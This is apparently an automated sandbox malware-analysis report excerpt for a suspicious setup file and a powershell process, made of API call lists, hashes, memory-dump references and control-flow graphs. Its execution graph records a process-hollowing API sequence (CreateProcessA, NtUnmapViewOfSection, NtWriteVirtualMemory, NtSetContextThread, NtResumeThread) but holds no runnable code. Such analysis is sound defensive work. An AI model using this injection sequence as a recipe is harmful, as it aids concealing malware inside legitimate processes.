                                                                                                                                  • Opcode Fuzzy Hash: 546a660c3a3c5793cfedcc045940b0098f6ff5b56a36a36c93076b4998a23383
                                                                                                                                  • Instruction Fuzzy Hash: 90F05870724FD482FB008F13B9147AAB322AB48FC4F889020EE0A0BF29DE28D4C18300
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                   • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                  • Opcode ID: 22aa5c619ebc81d22d9dfbe7be1db06b78379459a7dd84903556244d0fd23091
                                                                                                                                  • Instruction ID: 74e7441cc709b2c7a07dbbc3620493750a816427a60f2d25ce20d11238dd6a69
                                                                                                                                  • Opcode Fuzzy Hash: 22aa5c619ebc81d22d9dfbe7be1db06b78379459a7dd84903556244d0fd23091
                                                                                                                                  • Instruction Fuzzy Hash: E2F0BE71312B0081FF148B24E884BA97321EB89BA5FE41719CA6A46AF4CF3CD0C8C320
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 1C565C26
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                   • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2882836952-0
                                                                                                                                  • Opcode ID: 4ef01c9fa45567bbc3dd10e801282b8f302988525e8607d28c09eeec96ddb721
                                                                                                                                  • Instruction ID: 0249ca6411a9e03c48fd47e8ad83bbd21056c56c996e4d3b1153b9e4003593fd
                                                                                                                                  • Opcode Fuzzy Hash: 4ef01c9fa45567bbc3dd10e801282b8f302988525e8607d28c09eeec96ddb721
                                                                                                                                  • Instruction Fuzzy Hash: 7E51E836559B94C6EB60CB16E49475AB7B0F3C8B88F500216EA8E87F68DB7CC584CF14
                                                                                                                                  APIs
                                                                                                                                  • __except_validate_context_record.LIBVCRUNTIME ref: 1C568A8B
                                                                                                                                  • _IsNonwritableInCurrentImage.LIBCMT ref: 1C568B22
                                                                                                                                  • RtlUnwindEx.NTDLL ref: 1C568B7C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                   • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 2395640692-1018135373
                                                                                                                                  • Opcode ID: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
                                                                                                                                  • Instruction ID: 23bbda428f52d9562082be2be111b165a62f6c801b3ef210a5daca6bc149dd8f
                                                                                                                                  • Opcode Fuzzy Hash: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
                                                                                                                                  • Instruction Fuzzy Hash: 065127B2313A60CBEB04CF26E444B5D7362F754B9CF518225EE5A4BB18EB79D485C710
                                                                                                                                  APIs
                                                                                                                                  • __except_validate_context_record.LIBVCRUNTIME ref: 1C56A894
                                                                                                                                  • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 1C56A97C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                   • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                  • String ID: csm$csm
                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                  • Opcode ID: 74794b81e2150fdd3247c6b0929cf94a133a79a7c698cea2745a4c727450e9e7
                                                                                                                                  • Instruction ID: 57e72838cbf044be63825e428182b34121552cab6e3ab51f943dae81eb595630
                                                                                                                                  • Opcode Fuzzy Hash: 74794b81e2150fdd3247c6b0929cf94a133a79a7c698cea2745a4c727450e9e7
                                                                                                                                  • Instruction Fuzzy Hash: 7851AE366007E1CBDB208F23D64134D77A1F785B98F258226DB9A87F95CB38D4A1CB25
                                                                                                                                  APIs
                                                                                                                                  • EncodePointer.KERNEL32 ref: 1C56A51B
                                                                                                                                  • _CallSETranslator.LIBVCRUNTIME ref: 1C56A567
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                   • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                  • Opcode ID: 422e28baaeae7ac14bcee333ee3501689d432e8c3f34beb3876b8884b2d0f2c3
                                                                                                                                  • Instruction ID: 64cbb5059ce934bf180ac60bcb7ef5c21b685ad99f0c3e0d7bba46323fdc2db9
                                                                                                                                  • Opcode Fuzzy Hash: 422e28baaeae7ac14bcee333ee3501689d432e8c3f34beb3876b8884b2d0f2c3
                                                                                                                                  • Instruction Fuzzy Hash: 99518832908BC486DB21CF26E4817DABBA0F789B98F148215EB9917F59DB7CD194CB10
                                                                                                                                  APIs
                                                                                                                                  • StrCmpNW.SHLWAPI ref: 1C563742
                                                                                                                                  • StrStrW.SHLWAPI ref: 1C563760
                                                                                                                                  • StrToIntW.SHLWAPI ref: 1C563787
                                                                                                                                    • Part of subcall function 1C561A30: OpenProcess.KERNEL32 ref: 1C561A56
                                                                                                                                    • Part of subcall function 1C561A30: K32GetProcessImageFileNameW.KERNEL32 ref: 1C561A72
                                                                                                                                    • Part of subcall function 1C561A30: PathFindFileNameW.SHLWAPI ref: 1C561A81
                                                                                                                                    • Part of subcall function 1C561A30: lstrlenW.KERNEL32 ref: 1C561A8D
                                                                                                                                    • Part of subcall function 1C561A30: StrCpyW.SHLWAPI ref: 1C561AA0
                                                                                                                                    • Part of subcall function 1C561A30: CloseHandle.KERNEL32 ref: 1C561AAE
                                                                                                                                    • Part of subcall function 1C563D4C: StrCmpNIW.SHLWAPI(?,?,?,1C562722), ref: 1C563D64
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                   • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileNameProcess$CloseFindHandleImageOpenPathlstrlen
                                                                                                                                  • String ID: pid_
                                                                                                                                  • API String ID: 4193868204-4147670505
                                                                                                                                  • Opcode ID: 6ea48c97d0836b8524b32f86ee4346f1c82ecd9c2f2f8412e357fece5ccf2637
                                                                                                                                  • Instruction ID: ad9e6a668e477cdba7480d7190cc0ae2a5b215ae434b1c946c426589a13a716e
                                                                                                                                  • Opcode Fuzzy Hash: 6ea48c97d0836b8524b32f86ee4346f1c82ecd9c2f2f8412e357fece5ccf2637
                                                                                                                                  • Instruction Fuzzy Hash: 5D11C175314BA192FB008B25E84038AA3A5FB88B80FD00121DE4CD3F65EF78EA89C310
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                   • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2718003287-0
                                                                                                                                  • Opcode ID: 1e5131369e73c8b0b3a82c3b3899f962dfdd68d3e046a9ea647a68590475b17d
                                                                                                                                  • Instruction ID: ef02df1c4b44d8586d83b8aefcbb1d71eeead465b3e9e072ce739c14216d5428
                                                                                                                                  • Opcode Fuzzy Hash: 1e5131369e73c8b0b3a82c3b3899f962dfdd68d3e046a9ea647a68590475b17d
                                                                                                                                  • Instruction Fuzzy Hash: EAC1AC32B15B94CAE701CFB6D8406DD3BB6F394BD8B804216CE5EA7B58DA34D18AC350
APIs
• GetProcessHeap.KERNEL32(?,?,?,1C5619C5,?,?,00000000,1C561CB9), ref: 1C5614C6
• HeapFree.KERNEL32(?,?,?,1C5619C5,?,?,00000000,1C561CB9), ref: 1C5614D5
• GetProcessHeap.KERNEL32(?,?,?,1C5619C5,?,?,00000000,1C561CB9), ref: 1C5614E2
• HeapFree.KERNEL32(?,?,?,1C5619C5,?,?,00000000,1C561CB9), ref: 1C5614F1
• GetProcessHeap.KERNEL32(?,?,?,1C5619C5,?,?,00000000,1C561CB9), ref: 1C561501
Similarity
• API ID: Heap$Process$Free
• String ID:
• API String ID: 3168794593-0
APIs
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,1C57269F), ref: 1C5727D2
Similarity
• API ID: ConsoleMode
• String ID:
• API String ID: 4145635619-0
APIs
Strings
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
APIs
• RtlPcToFileHeader.NTDLL ref: 1C568F88
• RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,1C5685B7), ref: 1C568FC9
Strings
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
APIs
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
APIs
• GetProcessHeap.KERNEL32(?,?,00000000,1C56174C,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56126A
• HeapAlloc.KERNEL32(?,?,00000000,1C56174C,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561279
• GetProcessHeap.KERNEL32(?,?,00000000,1C56174C,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561293
• HeapAlloc.KERNEL32(?,?,00000000,1C56174C,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5612A4
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
APIs
• GetProcessHeap.KERNEL32(?,?,00000000,1C561754,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561006
• HeapAlloc.KERNEL32(?,?,00000000,1C561754,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561015
• GetProcessHeap.KERNEL32(?,?,00000000,1C561754,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561028
• HeapAlloc.KERNEL32(?,?,00000000,1C561754,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561037
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0

Execution Graph

Execution Coverage: 5.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 27
Total number of Limit Nodes: 0
execution_graph (each chain: node id and address -> node id, address and API call -> node id and address)
• 14821 7ffb4adf0ff4 -> 14822 7ffb4adf0ffd NtResumeThread -> 14824 7ffb4adf10b4
• 14805 7ffb4adeedc1 -> 14806 7ffb4adeedf3 MapViewOfFile -> 14808 7ffb4adeee63
• 14809 7ffb4adee7e1 -> 14810 7ffb4adee81a K32GetModuleInformation -> 14812 7ffb4adee882
• 14813 7ffb4adf0661 -> 14814 7ffb4adf06c4 CreateProcessA -> 14816 7ffb4adf0960
• 14825 7ffb4adf0a91 -> 14826 7ffb4adf0abe NtUnmapViewOfSection -> 14828 7ffb4adf0b1a
• 14829 7ffb4adeeb51 -> 14830 7ffb4adeeba4 CreateFileMappingW -> 14832 7ffb4adeecc9
• 14833 7ffb4adf0f30 -> 14834 7ffb4adf0f3f NtSetContextThread -> 14836 7ffb4adf0fca
• 14837 7ffb4adf0c6d -> 14838 7ffb4adf0c7b NtWriteVirtualMemory -> 14840 7ffb4adf0d47
• 14817 7ffb4adee8bc -> 14818 7ffb4adee8c5 CreateFileA -> 14820 7ffb4adeea5c

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1402 7ffb4adf0c6d-7ffb4adf0c79 1403 7ffb4adf0c84-7ffb4adf0cf8 1402->1403 1404 7ffb4adf0c7b-7ffb4adf0c83 1402->1404 1408 7ffb4adf0cfa-7ffb4adf0cff 1403->1408 1409 7ffb4adf0d02-7ffb4adf0d45 NtWriteVirtualMemory 1403->1409 1404->1403 1408->1409 1410 7ffb4adf0d47 1409->1410 1411 7ffb4adf0d4d-7ffb4adf0d6a 1409->1411 1410->1411
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1518046740.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4ade0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryVirtualWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3527976591-0
                                                                                                                                  • Opcode ID: d8022b8f11740593737fedd8175d26bd9a814917a9751ff23db71c1fc82d6ed3
                                                                                                                                  • Instruction ID: 4ff8b714f7d30982d433bfd5ef2a929c52f14cb450425bce7285471fae775998
                                                                                                                                  • Opcode Fuzzy Hash: d8022b8f11740593737fedd8175d26bd9a814917a9751ff23db71c1fc82d6ed3
                                                                                                                                  • Instruction Fuzzy Hash: 5431F37190CB4C8FDB18EF68D8856E9BBE4FF59321F04426EE049D3652CB74A806CB85

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 1412 7ffb4adf0ff4-7ffb4adf0ffb 1413 7ffb4adf1006-7ffb4adf10b2 NtResumeThread 1412->1413 1414 7ffb4adf0ffd-7ffb4adf1005 1412->1414 1418 7ffb4adf10ba-7ffb4adf10d6 1413->1418 1419 7ffb4adf10b4 1413->1419 1414->1413 1419->1418
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1518046740.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4ade0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ResumeThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                  • Opcode ID: d59c8a1b92e188c539094089bdfe50cf9d61ec91faeb9a7dd51838141f83f117
                                                                                                                                  • Instruction ID: b33e8206bf5e59112d2874f649c8af5c5ceedefcc893c73d4d4113fffcedddb3
                                                                                                                                  • Opcode Fuzzy Hash: d59c8a1b92e188c539094089bdfe50cf9d61ec91faeb9a7dd51838141f83f117
                                                                                                                                  • Instruction Fuzzy Hash: 4B31F671A0CA4C8FDB58DFA8D8457E9BBE1EF5A310F0441ABE40DD3256CB74A806CB91

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 1431 7ffb4adf0f30-7ffb4adf0fc8 NtSetContextThread 1435 7ffb4adf0fca 1431->1435 1436 7ffb4adf0fd0-7ffb4adf0fec 1431->1436 1435->1436
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1518046740.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4ade0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContextThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1591575202-0
                                                                                                                                  • Opcode ID: 6724d31f35413658519cb4f6a139554120b46ab5830a095a4966f2017163d11e
                                                                                                                                  • Instruction ID: f214bc3c66f0ce460d79c309686d741d4ab143cea54e1ba0594511eed38b449b
                                                                                                                                  • Opcode Fuzzy Hash: 6724d31f35413658519cb4f6a139554120b46ab5830a095a4966f2017163d11e
                                                                                                                                  • Instruction Fuzzy Hash: 1721D670A0CB4C8FDB58DF98D8857E97BF0EB55320F04416BD049D3252C6749856CB91

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 1437 7ffb4adf0a91-7ffb4adf0b18 NtUnmapViewOfSection 1440 7ffb4adf0b1a 1437->1440 1441 7ffb4adf0b20-7ffb4adf0b3c 1437->1441 1440->1441
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1518046740.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4ade0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: SectionUnmapView
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 498011366-0
                                                                                                                                  • Opcode ID: fba6d3fc615438c20293242f99c38556cba4ab6c0c90a443914025550b723f40
                                                                                                                                  • Instruction ID: 6820f9cb4ff2c06db3a080ed118a05906d5d57ee0e7b9e35fe42f65ad4186bff
                                                                                                                                  • Opcode Fuzzy Hash: fba6d3fc615438c20293242f99c38556cba4ab6c0c90a443914025550b723f40
                                                                                                                                  • Instruction Fuzzy Hash: 68218671A08A0C8FDB58EF5CD88A7E9B7E0EB59321F04416ED40DD3256D770A855CB91
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1518799582.00007FFB4AEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4aeb0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5c5f256a2d3e998485782b4853732c5ee7b2e7b5335ea3d4ece9b3eb1673efb6
                                                                                                                                  • Instruction ID: a777395c286b15e0903b26789d20409b66bf50bb5d690df6e47fb17751ea9b46
                                                                                                                                  • Opcode Fuzzy Hash: 5c5f256a2d3e998485782b4853732c5ee7b2e7b5335ea3d4ece9b3eb1673efb6
                                                                                                                                  • Instruction Fuzzy Hash: 1243B171A0CB858FEB65EF28C495A6577D0FFA9700F2505AED489C7297DE20EC42CB81
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1518799582.00007FFB4AEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4aeb0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 53a909690d64b76f4ca9d24f90bb5fc851a9b7e922b4e29801851a9ced08e9b8
                                                                                                                                  • Instruction ID: 52f97cd65203082f693c6762f635a5769255cfadc53041915cd26faa741bd51c
                                                                                                                                  • Opcode Fuzzy Hash: 53a909690d64b76f4ca9d24f90bb5fc851a9b7e922b4e29801851a9ced08e9b8
                                                                                                                                  • Instruction Fuzzy Hash: 3833AE71A1CB498FEB65EF28C495A6577E0FFA9700F2405ADD489C7297DE20EC42CB81
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1518799582.00007FFB4AEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4aeb0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 908f3b712e4268c54c38252ab82d2380e528daf231db151f1a1c21cf47e5797c
                                                                                                                                  • Instruction ID: 01711bc554d6c99f112bfeea8d64dde8b5b0bb15234d063a8cc4852eb899c482
                                                                                                                                  • Opcode Fuzzy Hash: 908f3b712e4268c54c38252ab82d2380e528daf231db151f1a1c21cf47e5797c
                                                                                                                                  • Instruction Fuzzy Hash: FC33AE71A1CB498FEB65EF28C495A6577E0FFA8700F2405ADD489C7296DE20FC42CB85

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 1323 7ffb4adf0661-7ffb4adf0702 1326 7ffb4adf0704-7ffb4adf0713 1323->1326 1327 7ffb4adf0760-7ffb4adf0792 1323->1327 1326->1327 1328 7ffb4adf0715-7ffb4adf0718 1326->1328 1334 7ffb4adf0794-7ffb4adf07a3 1327->1334 1335 7ffb4adf07f0-7ffb4adf0841 1327->1335 1329 7ffb4adf071a-7ffb4adf072d 1328->1329 1330 7ffb4adf0752-7ffb4adf075a 1328->1330 1332 7ffb4adf0731-7ffb4adf0744 1329->1332 1333 7ffb4adf072f 1329->1333 1330->1327 1332->1332 1336 7ffb4adf0746-7ffb4adf074e 1332->1336 1333->1332 1334->1335 1337 7ffb4adf07a5-7ffb4adf07a8 1334->1337 1341 7ffb4adf0843-7ffb4adf0852 1335->1341 1342 7ffb4adf089f-7ffb4adf08d0 1335->1342 1336->1330 1339 7ffb4adf07aa-7ffb4adf07bd 1337->1339 1340 7ffb4adf07e2-7ffb4adf07ea 1337->1340 1343 7ffb4adf07c1-7ffb4adf07d4 1339->1343 1344 7ffb4adf07bf 1339->1344 1340->1335 1341->1342 1346 7ffb4adf0854-7ffb4adf0857 1341->1346 1350 7ffb4adf08d2-7ffb4adf08da 1342->1350 1351 7ffb4adf08de-7ffb4adf095e CreateProcessA 1342->1351 1343->1343 1345 7ffb4adf07d6-7ffb4adf07de 1343->1345 1344->1343 1345->1340 1347 7ffb4adf0859-7ffb4adf086c 1346->1347 1348 7ffb4adf0891-7ffb4adf0899 1346->1348 1352 7ffb4adf0870-7ffb4adf0883 1347->1352 1353 7ffb4adf086e 1347->1353 1348->1342 1350->1351 1354 7ffb4adf0966-7ffb4adf09a3 call 7ffb4adf09bf 1351->1354 1355 7ffb4adf0960 1351->1355 1352->1352 1356 7ffb4adf0885-7ffb4adf088d 1352->1356 1353->1352 1359 7ffb4adf09aa-7ffb4adf09be 1354->1359 1360 7ffb4adf09a5 1354->1360 1355->1354 1356->1348 1360->1359
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1518046740.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4ade0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  • Opcode ID: b21d8c78c8eaa98a4100d1a664a2137ce840bbefd30832f90b9a11888c356664
                                                                                                                                  • Instruction ID: c0e4d1368f1b49dbcb2f0f9330024c28eca14d565248eb1bc8820175c4d85937
                                                                                                                                  • Opcode Fuzzy Hash: b21d8c78c8eaa98a4100d1a664a2137ce840bbefd30832f90b9a11888c356664
                                                                                                                                  • Instruction Fuzzy Hash: 5CB19570618A4D8FEB68EF28D8467EA77D1FB58311F10426EEC4DC7291DB74A5818BC2

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 1361 7ffb4adee8bc-7ffb4adee8c3 1362 7ffb4adee8c5-7ffb4adee8cd 1361->1362 1363 7ffb4adee8ce-7ffb4adee967 1361->1363 1362->1363 1367 7ffb4adee969-7ffb4adee978 1363->1367 1368 7ffb4adee9c2-7ffb4adeea5a CreateFileA 1363->1368 1367->1368 1369 7ffb4adee97a-7ffb4adee97d 1367->1369 1375 7ffb4adeea62-7ffb4adeea9e call 7ffb4adeeaba 1368->1375 1376 7ffb4adeea5c 1368->1376 1370 7ffb4adee9b7-7ffb4adee9bf 1369->1370 1371 7ffb4adee97f-7ffb4adee992 1369->1371 1370->1368 1373 7ffb4adee996-7ffb4adee9a9 1371->1373 1374 7ffb4adee994 1371->1374 1373->1373 1377 7ffb4adee9ab-7ffb4adee9b3 1373->1377 1374->1373 1381 7ffb4adeeaa5-7ffb4adeeab9 1375->1381 1382 7ffb4adeeaa0 1375->1382 1376->1375 1377->1370 1382->1381
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
